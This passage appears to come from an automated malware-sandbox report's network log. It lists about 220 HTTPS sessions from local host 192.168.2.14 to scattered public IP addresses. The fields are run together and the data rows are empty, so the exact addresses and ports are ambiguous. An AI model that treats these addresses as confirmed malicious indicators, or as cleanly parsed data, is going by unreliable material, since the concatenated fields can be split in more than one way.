                                              14646192.168.2.1438718116.55.85.193443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14647192.168.2.1439172147.24.143.44443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14648192.168.2.1435034104.162.65.83443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14649192.168.2.1455260162.196.22.79443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14650192.168.2.146022494.14.173.132443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14651192.168.2.143320639.16.40.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14652192.168.2.1455510149.231.208.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14653192.168.2.1442354115.28.102.138443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14654192.168.2.1460706182.172.2.46443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14655192.168.2.143794665.161.200.78443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14656192.168.2.144264281.154.72.106443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14657192.168.2.1444400162.77.122.183443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14658192.168.2.145117274.23.169.242443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14659192.168.2.146045478.55.174.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14660192.168.2.146087864.47.203.64443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14661192.168.2.14348422.5.182.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14662192.168.2.145638886.100.31.74443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14663192.168.2.1443770173.2.176.108443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14664192.168.2.1439494134.73.151.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14665192.168.2.145004836.229.225.164443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14666192.168.2.1440000135.59.192.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14667192.168.2.145146259.151.32.9443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14668192.168.2.143693019.211.202.28443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14669192.168.2.144586475.176.11.14443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14670192.168.2.145171697.96.34.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14671192.168.2.1433334150.2.180.29443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14672192.168.2.1454764144.69.79.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14673192.168.2.1460818148.84.127.199443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14674192.168.2.14466629.41.213.223443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14675192.168.2.1458080217.139.25.21443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14676192.168.2.1457054113.23.179.110443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14677192.168.2.14515164.118.109.166443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14678192.168.2.144280844.29.0.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14679192.168.2.1448586142.8.192.34443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14680192.168.2.1445840146.0.119.226443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14681192.168.2.1454544101.11.183.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14682192.168.2.1445762213.8.39.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14683192.168.2.1455158199.110.170.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14684192.168.2.144936075.207.226.90443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14685192.168.2.144195274.58.31.228443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14686192.168.2.145975060.235.229.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14687192.168.2.1458988105.91.51.166443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14688192.168.2.1447068144.144.95.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14689192.168.2.1435836116.12.35.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14690192.168.2.145801239.177.205.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14691192.168.2.14525462.187.61.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14692192.168.2.1451596106.58.101.66443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14693192.168.2.1460222142.227.138.48443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14694192.168.2.145446061.26.53.173443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14695192.168.2.1437698205.215.209.129443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14696192.168.2.1453616112.51.106.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14697192.168.2.1459038185.20.113.129443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14698192.168.2.143460079.169.202.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14699192.168.2.1441874126.198.165.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14700192.168.2.1445150104.110.62.90443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14701192.168.2.1460328134.161.4.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14702192.168.2.144465494.12.206.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14703192.168.2.145220874.206.109.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14704192.168.2.1455214149.107.113.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14705192.168.2.1447210199.89.52.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14706192.168.2.1440408135.83.84.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14707192.168.2.1459472184.226.160.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14708192.168.2.1435182198.130.93.216443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14709192.168.2.1452950121.176.57.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14710192.168.2.1452804191.233.16.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14711192.168.2.145392446.247.42.164443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14712192.168.2.1440924199.141.252.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14713192.168.2.1451270207.222.189.87443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14714192.168.2.143346658.43.99.164443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14715192.168.2.145514031.251.112.74443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14716192.168.2.1435508219.71.235.220443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14717192.168.2.1450324157.10.175.242443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14718192.168.2.145548240.93.204.40443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14719192.168.2.1453568123.79.196.113443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14720192.168.2.143629472.196.38.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14721192.168.2.14362365.234.71.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14722192.168.2.1448380190.243.240.86443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14723192.168.2.1453146194.174.8.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14724192.168.2.145055094.2.162.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14725192.168.2.145123247.199.62.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14726192.168.2.144348683.5.198.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14727192.168.2.143565651.194.111.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14728192.168.2.1450316187.125.11.242443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14729192.168.2.1445430162.217.102.141443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14730192.168.2.143671282.161.182.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14731192.168.2.1456092136.240.1.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14732192.168.2.143841875.50.35.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14733192.168.2.145080894.143.222.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14734192.168.2.1453242130.93.84.167443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14735192.168.2.145231018.199.127.3443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14736192.168.2.1451960168.13.143.171443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14737192.168.2.1435464180.64.110.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14738192.168.2.143322031.254.66.1443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14739192.168.2.1439882141.163.240.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14740192.168.2.1450178114.166.147.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14741192.168.2.1458668189.39.53.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14742192.168.2.1457678135.125.100.169443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14743192.168.2.1443312160.177.45.159443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14744192.168.2.1446996142.122.233.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14745192.168.2.1453544218.85.115.157443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14746192.168.2.144263673.107.138.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14747192.168.2.1458210173.130.247.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14748192.168.2.1458292180.141.193.127443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14749192.168.2.144057236.66.241.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14750192.168.2.1453826208.238.103.242443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14751192.168.2.1457352133.226.210.251443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14752192.168.2.145526888.4.255.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14753192.168.2.144904424.170.215.98443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14754192.168.2.145704827.167.240.89443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14755192.168.2.145258827.10.184.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14756192.168.2.1439190134.160.154.139443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14757192.168.2.1436314153.62.231.31443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14758192.168.2.1454554206.87.46.74443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14759192.168.2.143578637.36.35.21443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14760192.168.2.1437108150.31.206.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14761192.168.2.1437702136.64.139.195443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14762192.168.2.145298894.216.21.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14763192.168.2.1436522166.241.139.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14764192.168.2.1433902133.116.188.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14765192.168.2.1447604150.209.248.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14766192.168.2.1447870165.24.163.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14767192.168.2.143989079.246.110.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14768192.168.2.1441926111.136.21.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14769192.168.2.143526639.225.227.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14770192.168.2.145044659.43.187.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14771192.168.2.144621040.186.240.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14772192.168.2.1454170219.60.44.183443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14773192.168.2.1450004153.177.231.170443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14774192.168.2.145610646.72.90.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14775192.168.2.1459750156.211.229.224443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14776192.168.2.1451916221.36.54.245443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14777192.168.2.144640836.145.36.181443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14778192.168.2.1458968152.45.146.106443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14779192.168.2.143611495.168.190.193443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14780192.168.2.144487441.217.25.35443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14781192.168.2.144850292.182.14.106443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14782192.168.2.143675079.214.137.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14783192.168.2.144067050.226.19.190443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14784192.168.2.146021040.39.203.159443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14785192.168.2.144041472.85.207.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14786192.168.2.143587236.111.153.159443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14787192.168.2.1437776223.12.97.67443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14788192.168.2.143940073.66.244.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14789192.168.2.145379062.203.98.243443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14790192.168.2.1434092117.218.22.169443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14791192.168.2.144899682.3.102.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14792192.168.2.1438510108.121.225.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14793192.168.2.1448038123.128.97.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14794192.168.2.144875412.221.90.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14795192.168.2.1442770109.147.49.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14796192.168.2.143585242.193.234.49443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14797192.168.2.1448694170.252.113.77443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14798192.168.2.1455240163.56.215.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14799192.168.2.144085295.164.229.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14800192.168.2.1457626198.9.178.71443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14801192.168.2.1442372193.4.15.164443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14802192.168.2.143301235.142.222.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14803192.168.2.144278665.44.73.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14804192.168.2.144372288.150.23.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14805192.168.2.1432772104.66.183.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14806192.168.2.1455596136.205.202.135443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14807192.168.2.1456732161.178.114.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14808192.168.2.1457760210.158.230.212443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14809192.168.2.1456670174.207.51.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14810192.168.2.1459958101.226.161.252443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14811192.168.2.1445726113.114.50.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14812192.168.2.1452650162.40.62.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14813192.168.2.1444278106.34.79.148443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14814192.168.2.1457040182.193.85.1443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14815192.168.2.1449692208.67.154.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14816192.168.2.1434806185.19.161.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14817192.168.2.143745463.143.162.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14818192.168.2.144623886.84.70.209443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14819192.168.2.145911269.118.172.65443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14820192.168.2.1441622201.76.161.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14821192.168.2.14450009.240.160.133443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14822192.168.2.1456340103.137.32.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14823192.168.2.145836077.20.172.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14824192.168.2.143362480.99.25.107443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14825192.168.2.1446190179.207.78.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14826192.168.2.1449352191.188.139.22443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14827192.168.2.1446270177.40.193.175443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14828192.168.2.145418281.47.4.110443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14829192.168.2.1447350162.175.240.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14830192.168.2.1452272179.36.147.61443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14831192.168.2.144533837.107.228.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14832192.168.2.1448952124.1.52.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14833192.168.2.1452814158.212.18.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14834192.168.2.145969069.155.229.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14835192.168.2.144044694.160.27.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14836192.168.2.1455630117.13.84.1443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14837192.168.2.1440970184.75.185.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14838192.168.2.143344091.52.61.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14839192.168.2.1434608129.114.163.92443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14840192.168.2.14539765.155.93.146443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14841192.168.2.144511666.43.145.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14842192.168.2.1446818123.17.246.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14843192.168.2.1453108196.165.29.135443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14844192.168.2.1441230126.172.226.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14845192.168.2.1450214155.64.6.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14846192.168.2.144927032.125.106.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14847192.168.2.1437162110.132.42.251443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14848192.168.2.1445520103.216.39.175443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14849192.168.2.144596081.61.104.182443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14850192.168.2.1434716166.197.177.235443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14851192.168.2.145045420.125.122.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14852192.168.2.145407694.244.144.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14853192.168.2.1445370152.241.24.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14854192.168.2.145423066.112.14.164443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14855192.168.2.143847227.29.66.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14856192.168.2.1454820135.32.224.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14857192.168.2.1445116113.102.228.216443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14858192.168.2.1443864181.240.64.172443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14859192.168.2.14407942.219.4.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14860192.168.2.1460076179.219.65.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14861192.168.2.1458908212.231.6.137443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14862192.168.2.1433206141.153.143.235443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14863192.168.2.1453242115.128.187.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14864192.168.2.1436904222.38.148.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14865192.168.2.1445910195.216.165.41443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14866192.168.2.1438600188.149.5.113443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14867192.168.2.1449942221.170.32.181443
                                              TimestampBytes transferredDirectionData


